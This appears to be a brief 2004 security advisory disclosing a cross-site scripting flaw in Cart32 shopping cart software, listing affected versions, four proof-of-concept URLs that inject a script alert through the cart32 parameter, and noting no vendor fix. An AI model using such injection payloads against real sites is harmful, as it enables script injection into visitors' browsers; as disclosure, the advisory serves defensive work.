Reported June 28, 2004, by Dr Ponidi.

VERSIONS AFFECTED

  • McMurtrey/Whitaker & Associates' Cart32 5.0, 4.5, and 3.5a

DESCRIPTION
Cart32 contains a cross-site scripting vulnerability that could let a potential remote attacker insert third-party content in a Web site.

DEMONSTRATION
Any of the following URLs can be used to trigger the vulnerability:
http://vulnerable/scripts/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/scripts/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/cart32.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>
http://vulnerable/cgi-bin/c32web.exe/GetLatestBuilds?cart32=<script>alert('XSS')</script>

VENDOR RESPONSE
The vendor, McMurtrey/Whitaker & Associates, hasn't released a fix for this vulnerability.

CREDIT
Discovered by Dr Ponidi.